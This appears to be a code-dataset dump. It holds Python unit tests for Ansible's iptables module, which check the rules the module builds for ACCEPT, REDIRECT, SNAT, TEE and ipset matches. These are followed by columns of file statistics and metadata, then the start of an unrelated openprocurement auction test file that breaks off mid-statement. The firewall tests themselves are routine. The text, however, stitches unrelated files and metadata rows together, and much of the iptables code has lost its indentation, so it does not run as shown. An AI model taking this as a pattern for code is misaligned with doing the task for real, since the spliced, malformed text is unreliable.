with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertFalse(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
def test_policy_table_changed_false(self):
"""Test flush without parameters and change == false"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
'_ansible_check_mode': True,
})
commands_results = [
(0, 'Chain INPUT (policy DROP)\n', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
# TODO ADD test policy without chain fail
# TODO ADD test policy with chain don't exists
# TODO ADD test policy with wrong choice fail
def test_insert_rule_change_false(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'OUTPUT',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'ACCEPT',
'action': 'insert',
'_ansible_check_mode': True,
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
def test_insert_rule(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'OUTPUT',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'ACCEPT',
'action': 'insert'
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-I',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
def test_append_rule_check_mode(self):
"""Test append a redirection rule in check mode"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'REDIRECT',
'table': 'nat',
'to_destination': '5.5.5.5/32',
'protocol': 'udp',
'destination_port': '22',
'to_ports': '8600',
'_ansible_check_mode': True,
})
commands_results = [
(1, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
def test_append_rule(self):
"""Test append a redirection rule"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'REDIRECT',
'table': 'nat',
'to_destination': '5.5.5.5/32',
'protocol': 'udp',
'destination_port': '22',
'to_ports': '8600'
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-A',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
def test_remove_rule(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'SNAT',
'table': 'nat',
'to_source': '5.5.5.5/32',
'protocol': 'udp',
'source_port': '22',
'to_ports': '8600',
'state': 'absent',
'in_interface': 'eth0',
'out_interface': 'eth1',
'comment': 'this is a comment'
})
commands_results = [
(0, '', ''),
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-D',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
def test_remove_rule_check_mode(self):
"""Test flush without parameters check mode"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'SNAT',
'table': 'nat',
'to_source': '5.5.5.5/32',
'protocol': 'udp',
'source_port': '22',
'to_ports': '8600',
'state': 'absent',
'in_interface': 'eth0',
'out_interface': 'eth1',
'comment': 'this is a comment',
'_ansible_check_mode': True,
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
def test_insert_with_reject(self):
""" Using reject_with with a previously defined jump: REJECT results in two Jump statements #18988 """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'reject_with': 'tcp-reset',
'ip_version': 'ipv4',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-p',
'tcp',
'-j',
'REJECT',
'--reject-with',
'tcp-reset',
])
def test_insert_jump_reject_with_reject(self):
""" Using reject_with with a previously defined jump: REJECT results in two Jump statements #18988 """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'jump': 'REJECT',
'reject_with': 'tcp-reset',
'ip_version': 'ipv4',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-p',
'tcp',
'-j',
'REJECT',
'--reject-with',
'tcp-reset',
])
def test_jump_tee_gateway_negative(self):
""" Missing gateway when JUMP is set to TEE """
set_module_args({
'table': 'mangle',
'chain': 'PREROUTING',
'in_interface': 'eth0',
'protocol': 'udp',
'match': 'state',
'jump': 'TEE',
'ctstate': ['NEW'],
'destination_port': '9521',
'destination': '127.0.0.1'
})
with self.assertRaises(AnsibleFailJson) as e:
iptables.main()
self.assertTrue(e.exception.args[0]['failed'])
self.assertEqual(e.exception.args[0]['msg'], 'jump is TEE but all of the following are missing: gateway')
def test_jump_tee_gateway(self):
""" Using gateway when JUMP is set to TEE """
set_module_args({
'table': 'mangle',
'chain': 'PREROUTING',
'in_interface': 'eth0',
'protocol': 'udp',
'match': 'state',
'jump': 'TEE',
'ctstate': ['NEW'],
'destination_port': '9521',
'gateway': '192.168.10.1',
'destination': '127.0.0.1'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'mangle',
'-C', 'PREROUTING',
'-p', 'udp',
'-d', '127.0.0.1',
'-m', 'state',
'-j', 'TEE',
'--gateway', '192.168.10.1',
'-i', 'eth0',
'--destination-port', '9521',
'--state', 'NEW'
])
def test_tcp_flags(self):
""" Test various ways of inputting tcp_flags """
args = [
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': 'flags=ALL flags_set="ACK,RST,SYN,FIN"'
},
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': {
'flags': 'ALL',
'flags_set': 'ACK,RST,SYN,FIN'
}
},
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': {
'flags': ['ALL'],
'flags_set': ['ACK', 'RST', 'SYN', 'FIN']
}
},
]
for item in args:
set_module_args(item)
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-p',
'tcp',
'--tcp-flags',
'ALL',
'ACK,RST,SYN,FIN',
'-j',
'DROP'
])
def test_log_level(self):
""" Test various ways of log level flag """
log_levels = ['0', '1', '2', '3', '4', '5', '6', '7',
'emerg', 'alert', 'crit', 'error', 'warning', 'notice', 'info', 'debug']
for log_lvl in log_levels:
set_module_args({
'chain': 'INPUT',
'jump': 'LOG',
'log_level': log_lvl,
'source': '1.2.3.4/32',
'log_prefix': '** DROP-this_ip **'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'filter',
'-C', 'INPUT',
'-s', '1.2.3.4/32',
'-j', 'LOG',
'--log-prefix', '** DROP-this_ip **',
'--log-level', log_lvl
])
def test_iprange(self):
""" Test iprange module with its flags src_range and dst_range """
set_module_args({
'chain': 'INPUT',
'match': ['iprange'],
'src_range': '192.168.1.100-192.168.1.199',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-m',
'iprange',
'-j',
'ACCEPT',
'--src-range',
'192.168.1.100-192.168.1.199',
])
set_module_args({
'chain': 'INPUT',
'src_range': '192.168.1.100-192.168.1.199',
'dst_range': '10.0.0.50-10.0.0.100',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-j',
'ACCEPT',
'-m',
'iprange',
'--src-range',
'192.168.1.100-192.168.1.199',
'--dst-range',
'10.0.0.50-10.0.0.100'
])
set_module_args({
'chain': 'INPUT',
'dst_range': '10.0.0.50-10.0.0.100',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-j',
'ACCEPT',
'-m',
'iprange',
'--dst-range',
'10.0.0.50-10.0.0.100'
])
def test_insert_rule_with_wait(self):
    """Test 'insert' action together with the xtables lock option wait=10."""
    # (The original docstring "Test flush without parameters" was a
    # copy/paste leftover; the args below exercise action=insert + wait.)
    set_module_args({
        'chain': 'OUTPUT',
        'source': '1.2.3.4/32',
        'destination': '7.8.9.10/42',
        'jump': 'ACCEPT',
        'action': 'insert',
        'wait': '10'
    })
    commands_results = [
        (0, '', ''),  # rc=0: the '-C' existence check succeeds
    ]
    with patch.object(basic.AnsibleModule, 'run_command') as run_command:
        run_command.side_effect = commands_results
        with self.assertRaises(AnsibleExitJson) as result:
            iptables.main()
    self.assertTrue(result.exception.args[0]['changed'])
    self.assertEqual(run_command.call_count, 1)
    # '-w 10' appears right after the chain in the check invocation.
    self.assertEqual(run_command.call_args_list[0][0][0], [
        '/sbin/iptables',
        '-t',
        'filter',
        '-C',
        'OUTPUT',
        '-w',
        '10',
        '-s',
        '1.2.3.4/32',
        '-d',
        '7.8.9.10/42',
        '-j',
        'ACCEPT'
    ])
def test_comment_position_at_end(self):
    """Test that the comment match is rendered at the end of the rule."""
    # (The original docstring "Test flush without parameters" was a
    # copy/paste leftover; this test pins the comment's position.)
    set_module_args({
        'chain': 'INPUT',
        'jump': 'ACCEPT',
        'action': 'insert',
        'ctstate': ['NEW'],
        'comment': 'this is a comment',
        '_ansible_check_mode': True,
    })
    commands_results = [
        (0, '', ''),  # rc=0: the '-C' existence check succeeds
    ]
    with patch.object(basic.AnsibleModule, 'run_command') as run_command:
        run_command.side_effect = commands_results
        with self.assertRaises(AnsibleExitJson) as result:
            iptables.main()
    self.assertTrue(result.exception.args[0]['changed'])
    self.assertEqual(run_command.call_count, 1)
    self.assertEqual(run_command.call_args_list[0][0][0], [
        '/sbin/iptables',
        '-t',
        'filter',
        '-C',
        'INPUT',
        '-j',
        'ACCEPT',
        '-m',
        'conntrack',
        '--ctstate',
        'NEW',
        '-m',
        'comment',
        '--comment',
        'this is a comment'
    ])
    # Index 14 is the final argument: the comment text itself.
    self.assertEqual(run_command.call_args[0][0][14], 'this is a comment')
def test_destination_ports(self):
    """Check that multiport --dports joins ports and ranges into one
    comma-separated argument of the generated iptables command."""
    set_module_args({
        'chain': 'INPUT',
        'protocol': 'tcp',
        'in_interface': 'eth0',
        'source': '192.168.0.1/32',
        'destination_ports': ['80', '443', '8081:8085'],
        'jump': 'ACCEPT',
        'comment': 'this is a comment',
    })
    # The exact '-C' (check) invocation the module is expected to build.
    expected_command = [
        '/sbin/iptables',
        '-t', 'filter',
        '-C', 'INPUT',
        '-p', 'tcp',
        '-s', '192.168.0.1/32',
        '-j', 'ACCEPT',
        '-m', 'multiport',
        '--dports', '80,443,8081:8085',
        '-i', 'eth0',
        '-m', 'comment',
        '--comment', 'this is a comment'
    ]
    with patch.object(basic.AnsibleModule, 'run_command') as run_command:
        # Single successful result: the rule already exists.
        run_command.side_effect = [(0, '', '')]
        with self.assertRaises(AnsibleExitJson) as result:
            iptables.main()
    self.assertTrue(result.exception.args[0]['changed'])
    self.assertEqual(run_command.call_count, 1)
    self.assertEqual(run_command.call_args_list[0][0][0], expected_command)
def test_match_set(self):
    """ Test match_set together with match_set_flags """
    # Case 1: tcp + destination_port, ipset matched on source addresses.
    set_module_args({
        'chain': 'INPUT',
        'protocol': 'tcp',
        'match_set': 'admin_hosts',
        'match_set_flags': 'src',
        'destination_port': '22',
        'jump': 'ACCEPT',
        'comment': 'this is a comment',
    })
    commands_results = [
        (0, '', ''),  # rc=0: the '-C' existence check succeeds
    ]
    with patch.object(basic.AnsibleModule, 'run_command') as run_command:
        run_command.side_effect = commands_results
        with self.assertRaises(AnsibleExitJson) as result:
            iptables.main()
    self.assertTrue(result.exception.args[0]['changed'])
    self.assertEqual(run_command.call_count, 1)
    # match_set expands to '-m set --match-set <name> <flags>'.
    self.assertEqual(run_command.call_args_list[0][0][0], [
        '/sbin/iptables',
        '-t', 'filter',
        '-C', 'INPUT',
        '-p', 'tcp',
        '-j', 'ACCEPT',
        '--destination-port', '22',
        '-m', 'set',
        '--match-set', 'admin_hosts', 'src',
        '-m', 'comment',
        '--comment', 'this is a comment'
    ])
    # Case 2: udp + REJECT, ipset matched on both source and destination.
    set_module_args({
        'chain': 'INPUT',
        'protocol': 'udp',
        'match_set': 'banned_hosts',
        'match_set_flags': 'src,dst',
        'jump': 'REJECT',
    })
    commands_results = [
        (0, '', ''),
    ]
    with patch.object(basic.AnsibleModule, 'run_command') as run_command:
        run_command.side_effect = commands_results
        with self.assertRaises(AnsibleExitJson) as result:
            iptables.main()
    self.assertTrue(result.exception.args[0]['changed'])
    self.assertEqual(run_command.call_count, 1)
    self.assertEqual(run_command.call_args_list[0][0][0], [
        '/sbin/iptables',
        '-t', 'filter',
        '-C', 'INPUT',
        '-p', 'udp',
        '-j', 'REJECT',
        '-m', 'set',
        '--match-set', 'banned_hosts', 'src,dst'
    ])
| 31.027478
| 113
| 0.466015
| 3,125
| 31,617
| 4.54528
| 0.07744
| 0.089411
| 0.069699
| 0.096804
| 0.848916
| 0.805337
| 0.780484
| 0.761194
| 0.749507
| 0.743593
| 0
| 0.041048
| 0.38435
| 31,617
| 1,018
| 114
| 31.057957
| 0.688672
| 0.049404
| 0
| 0.835991
| 0
| 0
| 0.180803
| 0.004513
| 0
| 0
| 0
| 0.000982
| 0.121868
| 1
| 0.029613
| false
| 0
| 0.005695
| 0.002278
| 0.038724
| 0.001139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cfb936b0868b4385bbf65d371ab8d34cedabade
| 43,928
|
py
|
Python
|
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | 53
|
2016-07-05T11:46:16.000Z
|
2019-02-20T12:12:14.000Z
|
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | 11
|
2016-07-05T11:14:09.000Z
|
2018-05-30T07:10:37.000Z
|
# -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.core.tests.auctions import (
AuctionAuctionResourceTestMixin,
AuctionLotAuctionResourceTestMixin,
)
from openprocurement.auctions.core.tests.blanks.auction_blanks import (
post_auction_auction_not_changed,
post_auction_auction_reversed,
get_auction_features_auction,
)
from openprocurement.auctions.flash.tests.base import (
BaseAuctionWebTest,
test_features_auction_data,
test_bids,
test_lots,
test_organization)
from openprocurement.auctions.flash.tests.blanks.auction_blanks import (
post_auction_auction,
# FlashAuctionBridgePeriodPatch
set_auction_period,
reset_auction_period
)
class AuctionAuctionResourceTest(BaseAuctionWebTest, AuctionAuctionResourceTestMixin):
    """Auction-view endpoint tests for a flash auction without lots."""

    initial_status = 'active.tendering'
    initial_bids = test_bids

    # Blank test generated from the shared flash-specific scenario.
    test_post_auction_auction = snitch(post_auction_auction)
class AuctionSameValueAuctionResourceTest(BaseAuctionWebTest):
    """Auction results when every bid carries an identical value."""

    initial_status = 'active.auction'
    # Three bids with the same amount from the same tenderer; the
    # comprehension builds three distinct dict objects.
    initial_bids = [
        {
            "tenderers": [test_organization],
            "value": {
                "amount": 469,
                "currency": "UAH",
                "valueAddedTaxIncluded": True,
            },
        }
        for _ in range(3)
    ]

    test_post_auction_auction_not_changed = snitch(post_auction_auction_not_changed)
    test_post_auction_auction_reversed = snitch(post_auction_auction_reversed)
class AuctionLotAuctionResourceTest(
        BaseAuctionWebTest,
        AuctionLotAuctionResourceTestMixin):
    """Auction-view endpoint tests for an auction with a single lot."""
    initial_status = 'active.tendering'
    initial_bids = test_bids
    initial_lots = test_lots
def test_get_auction_auction(self):
    """GET /auctions/{id}/auction for a single-lot auction across statuses."""
    self.app.authorization = ('Basic', ('auction', ''))
    # Auction info is forbidden while tendering is still active.
    response = self.app.get(
        '/auctions/{}/auction'.format(self.auction_id), status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't get auction info in current (active.tendering) auction status")
    self.set_status('active.auction')
    response = self.app.get('/auctions/{}/auction'.format(self.auction_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    auction = response.json['data']
    self.assertNotEqual(auction, self.initial_data)
    self.assertIn('dateModified', auction)
    self.assertIn('minimalStep', auction)
    self.assertIn('lots', auction)
    # Participant identities are stripped from the auction-service view.
    self.assertNotIn("procuringEntity", auction)
    self.assertNotIn("tenderers", auction["bids"][0])
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        self.initial_bids[0]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        self.initial_bids[1]['lotValues'][0]['value']['amount'])
    self.set_status('active.qualification')
    # Once qualification starts, the view is forbidden again.
    response = self.app.get(
        '/auctions/{}/auction'.format(self.auction_id), status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't get auction info in current (active.qualification) auction status")
def test_post_auction_auction(self):
    """POST auction results for a single-lot auction, covering validation."""
    # NOTE(review): indentation reconstructed from flattened dump -- verify
    # block nesting against the upstream file.
    self.app.authorization = ('Basic', ('auction', ''))
    # Results may only be reported while the auction is running.
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't report auction results in current (active.tendering) auction status")
    self.set_status('active.auction')
    # Unknown bid fields are rejected as "Rogue field".
    response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {
        'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': {
        u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
    patch_data = {
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                'lotValues': [
                    {
                        "value": {
                            "amount": 419,
                            "currency": "UAH",
                            "valueAddedTaxIncluded": True
                        }
                    }
                ]
            }
        ]
    }
    # One result for two bids -> bid-count mismatch.
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Number of auction results did not match the number of auction bids")
    patch_data['bids'].append({
        'lotValues': [
            {
                "value": {
                    "amount": 409,
                    "currency": "UAH",
                    "valueAddedTaxIncluded": True
                }
            }
        ]
    })
    # Malformed bid id (not a 32-char hash).
    patch_data['bids'][1]['id'] = "some_id"
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], {
        u'id': [u'Hash value is wrong length.']})
    # Well-formed but unknown bid id.
    patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Auction bids should be identical to the auction bids")
    # Valid payload (bid ids swapped relative to initial order); report
    # results per lot.
    patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
    for lot in self.initial_lots:
        response = self.app.post_json(
            '/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
    self.assertNotEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        self.initial_bids[0]['lotValues'][0]['value']['amount'])
    self.assertNotEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        self.initial_bids[1]['lotValues'][0]['value']['amount'])
    # Reported amounts land on the opposite bids (ids were swapped above).
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        patch_data["bids"][1]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        patch_data["bids"][0]['lotValues'][0]['value']['amount'])
    self.assertEqual('active.qualification', auction["status"])
    self.assertIn("tenderers", auction["bids"][0])
    self.assertIn("name", auction["bids"][0]["tenderers"][0])
    # self.assertIn(auction["awards"][0]["id"], response.headers['Location'])
    self.assertEqual(
        auction["awards"][0]['bid_id'],
        patch_data["bids"][0]['id'])
    self.assertEqual(
        auction["awards"][0]['value']['amount'],
        patch_data["bids"][0]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["awards"][0]['suppliers'],
        self.initial_bids[0]['tenderers'])
    # No further reporting once qualification has started.
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't report auction results in current (active.qualification) auction status")
def test_patch_auction_auction(self):
    """PATCH auction/participation URLs for a single-lot auction."""
    # NOTE(review): indentation reconstructed from flattened dump -- verify
    # block nesting against the upstream file.
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't update auction urls in current (active.tendering) auction status")
    self.set_status('active.auction')
    # NOTE(review): no-op chronograph patch -- presumably forces a status
    # recalculation; confirm intent.
    self.app.authorization = ('Basic', ('chronograph', ''))
    response = self.app.patch_json(
        '/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.patch_json('/auctions/{}/auction'.format(self.auction_id), {
        'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': {
        u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
    patch_data = {
        'auctionUrl': u'http://auction-sandbox.openprocurement.org/auctions/{}'.format(
            self.auction_id),
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                "participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
